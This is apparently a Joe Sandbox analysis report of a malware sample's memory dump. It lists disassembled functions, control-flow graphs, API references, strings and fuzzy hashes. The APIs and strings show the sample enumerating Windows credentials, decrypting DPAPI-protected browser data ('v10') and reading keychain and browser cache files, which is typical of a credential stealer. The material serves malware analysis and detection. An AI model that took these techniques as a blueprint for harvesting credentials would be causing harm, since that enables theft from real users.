                                                            • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                            Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                            • memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 00407082
                                                              • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpymemset
                                                            • String ID:
                                                            • API String ID: 2037443186-0
                                                            • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                            • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                            • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                            • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                            APIs
                                                            • memset.MSVCRT ref: 004455C2
                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 0044570D
                                                            • memset.MSVCRT ref: 00445725
                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            • memset.MSVCRT ref: 0044573D
                                                            • memset.MSVCRT ref: 00445755
                                                            • memset.MSVCRT ref: 004458CB
                                                            • memset.MSVCRT ref: 004458E3
                                                            • memset.MSVCRT ref: 0044596E
                                                            • memset.MSVCRT ref: 00445A10
                                                            • memset.MSVCRT ref: 00445A28
                                                            • memset.MSVCRT ref: 00445AC6
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            • memset.MSVCRT ref: 00445B52
                                                            • memset.MSVCRT ref: 00445B6A
                                                            • memset.MSVCRT ref: 00445C9B
                                                            • memset.MSVCRT ref: 00445CB3
                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                            • memset.MSVCRT ref: 00445B82
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                            • memset.MSVCRT ref: 00445986
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                            • API String ID: 1963886904-3798722523
                                                            • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                            • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                            • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                            • String ID: $/deleteregkey$/savelangfile
                                                            • API String ID: 2744995895-28296030
                                                            • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                            • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                            Function 00431A7B Relevance: 30.6, APIs: 3, Strings: 17, Instructions: 602COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 393 431a7b-431a9d 394 431aa3-431aa9 393->394 395 43210b-432137 call 42c02e call 4325ad call 4158f6 393->395 394->395 397 431aaf-431ab8 call 43817e 394->397 397->395 403 431abe-431ac3 397->403 405 431b33-431b3e 403->405 406 431ac5-431adc call 43041c 403->406 405->395 409 431b44-431b52 call 43824b 405->409 406->395 413 431ae2-431af8 call 42fac6 406->413 414 431b55-431b7a call 416a7d 409->414 419 431b06-431b1f call 42ff8c 413->419 420 431afa-431b05 call 42faf4 413->420 421 431baa-431bae 414->421 422 431b7c-431b93 memcmp 414->422 419->395 433 431b25-431b2c 419->433 420->419 428 431bb0 421->428 429 431bbe-431bc2 421->429 422->421 425 431b95-431b97 422->425 432 431b9c-431ba3 call 4169a7 425->432 434 431bb5-431bbc call 4169a7 428->434 430 431bc4-431bc9 429->430 431 431bcb-431bcf 429->431 430->434 435 431bd1-431be1 call 43034a 431->435 436 431c45-431c4b 431->436 447 431ba4-431ba5 432->447 433->414 438 431b2e 433->438 434->447 435->395 448 431be7-431bf2 call 430468 435->448 441 431c51-431c53 436->441 438->395 445 431c55-431c6d call 4165ff 441->445 446 431c4d-431c50 441->446 445->395 453 431c73-431c78 445->453 446->441 447->395 448->395 454 431bf8-431bfe 448->454 455 431cc7-431ccb 453->455 456 431c7a-431ca8 call 41691b call 42bf4c 453->456 459 431c00-431c0d call 42ff13 454->459 460 431c1c-431c2c call 42fffc 454->460 457 431cf6-431d21 call 41691b call 415a91 455->457 458 431ccd-431cd0 455->458 456->395 482 431cae-431cc5 call 42bfcf 456->482 485 4320f0-4320f2 457->485 486 431d27-431da2 memcpy 457->486 462 431cd2-431cd6 458->462 475 431c19 459->475 476 431c0f-431c17 459->476 460->453 473 431c2e-431c32 460->473 468 431cf0-431cf4 462->468 469 431cd8-431cdd 462->469 468->457 468->462 469->468 474 431cdf-431ced call 41691b 469->474 473->395 479 431c38-431c40 473->479 474->468 475->460 476->432 479->432 482->455 485->395 490 4320f4-432108 call 4158f6 * 2 485->490 487 431e97-431eaa call 432154 486->487 488 431da8-431dbf 486->488 501 431eb0-431eb3 487->501 502 431f3c-431f43 487->502 491 431dc1-431dd0 call 416a42 488->491 492 431de4-431def 488->492 490->395 491->492 508 431dd2-431de2 491->508 497 431df5-431e02 492->497 498 431eb8-431ed4 call 4169a7 492->498 503 431e31-431e43 497->503 504 431e04-431e09 497->504 498->485 509 431f38-431f3a 501->509 510 431fc3-431fd9 call 4397fd 502->510 511 431f45-431f56 call 41691b call 4172c8 502->511 514 431e50-431e57 503->514 515 431e45-431e4d 503->515 504->503 512 431e0b-431e2f call 41691b memcpy 504->512 508->491 508->492 509->502 516 431ed9-431edf 509->516 510->485 529 431fdf-432004 call 4328e4 call 4233ae 510->529 535 431f5b-431f5f 511->535 512->514 520 431e59-431e67 call 430af5 514->520 521 431e6d-431e91 514->521 515->514 524 431ee1-431ee7 516->524 525 431f35 516->525 520->485 520->521 521->487 521->488 531 431ee9-431ef4 524->531 532 431f2d-431f33 524->532 525->509 560 432031-432069 call 42fe8b call 4158f6 529->560 561 432006-43200e 529->561 536 431ef9-431f07 531->536 532->525 533 431f6a-431f72 532->533 533->485 540 431f78-431f7a 533->540 538 431f61-431f65 535->538 539 431fa7-431fb2 535->539 536->532 541 431f09-431f17 536->541 538->485 542 4320c0-4320c4 539->542 543 431fb8-431fbe 539->543 545 431f92-431f96 540->545 546 431f7c-431f7f 540->546 547 431f22-431f2b 541->547 548 431f19-431f20 call 416a42 541->548 553 4320c6-4320ca 542->553 554 4320cc-4320d3 542->554 543->542 545->485 552 431f9c-431fa2 545->552 546->545 549 431f81-431f91 call 4169a7 546->549 547->532 551 431ef6 547->551 548->532 548->547 549->545 551->536 552->485 553->485 553->554 558 4320e2-4320e8 554->558 559 4320d5-4320da 554->559 567 4320eb-4320ee 558->567 559->558 566 4320dc-4320e0 559->566 560->542 577 43206b-4320bd call 431917 call 430b5d call 4165ff call 4233c5 call 423330 560->577 562 432010 561->562 563 432015-43202e call 4165ff 561->563 562->563 563->560 566->558 570 432143-432147 566->570 567->485 573 432149-432152 570->573 574 432138-43213f 570->574 573->567 574->573 576 432141 574->576 576->570 577->542
                                                            APIs
                                                            • memcmp.MSVCRT(-00000007,altertab_,00000009,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431B89
                                                            • memcpy.MSVCRT(?,00000000,00000001,?,?,00000000,?,?,?,?,?,00430A5E,?,00000000,00000000,00000000), ref: 00431D51
                                                            • memcpy.MSVCRT(?,?,00000001,?,?,?,?,?,00000000), ref: 00431E1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID: UNIQUE$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$^C$altertab_$conflicting ON CONFLICT clauses specified$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$table %s has no column named %s$table %s may not be indexed$there is already a table named %s$views may not be indexed$virtual tables may not be indexed
                                                            • API String ID: 3384217055-1911042424
                                                            • Opcode ID: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                            • Instruction ID: e88dbce5606702523dc3cb2fd075dc3f1625e0cc8bc5801943b2d4f1258beff1
                                                            • Opcode Fuzzy Hash: d928db19582c28ca8c02c01d818c3ea7e2379e86659ed06695b417945a973fd5
                                                            • Instruction Fuzzy Hash: E9328E71A002059FDF14DF65C981AAEBBB1EF08314F2550AEE805AB352D779EE41CF98
                                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                            • memset.MSVCRT ref: 0040B756
                                                            • memset.MSVCRT ref: 0040B7F5
                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                            • memset.MSVCRT ref: 0040B851
                                                            • memset.MSVCRT ref: 0040B8CA
                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                            • memset.MSVCRT ref: 0040BB53
                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                            • String ID: chp$v10
                                                            • API String ID: 1297422669-2783969131
                                                            • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                            • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 699 40e2ab-40e2d5 call 40695d call 406b90 704 40e4a0-40e4af call 4069a3 699->704 705 40e2db-40e300 699->705 706 40e304-40e30f call 406e8f 705->706 710 40e314-40e316 706->710 711 40e476-40e483 call 406b53 710->711 712 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 710->712 718 40e302 711->718 719 40e489-40e495 call 40aa04 711->719 736 40e3c9-40e3ce 712->736 737 40e39d-40e3ae call 40742e 712->737 718->706 719->704 724 40e497-40e49f free 719->724 724->704 739 40e3d0-40e3d6 736->739 740 40e3d9-40e3de 736->740 746 40e3b0 737->746 747 40e3b3-40e3c1 wcschr 737->747 739->740 742 40e3e0-40e3f1 memcpy 740->742 743 40e3f4-40e3f9 740->743 742->743 744 40e3fb-40e40c memcpy 743->744 745 40e40f-40e414 743->745 744->745 748 40e416-40e427 memcpy 745->748 749 40e42a-40e42f 745->749 746->747 747->736 750 40e3c3-40e3c6 747->750 748->749 751 40e431-40e442 memcpy 749->751 752 40e445-40e44a 749->752 750->736 751->752 753 40e44c-40e45b 752->753 754 40e45e-40e463 752->754 753->754 754->711 755 40e465-40e469 754->755 755->711 756 40e46b-40e473 755->756 756->711
                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 0040E49A
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E3EC
                                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E407
                                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E422
                                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E43D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                            • API String ID: 3849927982-2252543386
                                                            • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                            • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 757 4091b8-40921b memset call 40a6e6 call 444432 762 409520-409526 757->762 763 409221-40923b call 40b273 call 438552 757->763 767 409240-409248 763->767 768 409383-4093ab call 40b273 call 438552 767->768 769 40924e-409258 call 4251c4 767->769 781 4093b1 768->781 782 4094ff-40950b call 443d90 768->782 774 40937b-40937e call 424f26 769->774 775 40925e-409291 call 4253cf * 2 call 4253af * 2 769->775 774->768 775->774 805 409297-409299 775->805 785 4093d3-4093dd call 4251c4 781->785 782->762 791 40950d-409511 782->791 792 4093b3-4093cc call 4253cf * 2 785->792 793 4093df 785->793 791->762 795 409513-40951d call 408f2f 791->795 792->785 808 4093ce-4093d1 792->808 797 4094f7-4094fa call 424f26 793->797 795->762 797->782 805->774 807 40929f-4092a3 805->807 807->774 809 4092a9-4092ba 807->809 808->785 812 4093e4-4093fb call 4253af * 2 808->812 810 4092bc 809->810 811 4092be-4092e3 memcpy memcmp 809->811 810->811 813 409333-409345 memcmp 811->813 814 4092e5-4092ec 811->814 812->797 822 409401-409403 812->822 813->774 817 409347-40935f memcpy 813->817 814->774 816 4092f2-409331 memcpy * 2 814->816 819 409363-409378 memcpy 816->819 817->819 819->774 822->797 823 409409-40941b memcmp 822->823 823->797 824 409421-409433 memcmp 823->824 825 4094a4-4094b6 memcmp 824->825 826 409435-40943c 824->826 825->797 828 4094b8-4094ed memcpy * 2 825->828 826->797 827 409442-4094a2 memcpy * 3 826->827 829 4094f4 827->829 828->829 829->797
                                                            APIs
                                                            • memset.MSVCRT ref: 004091E2
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
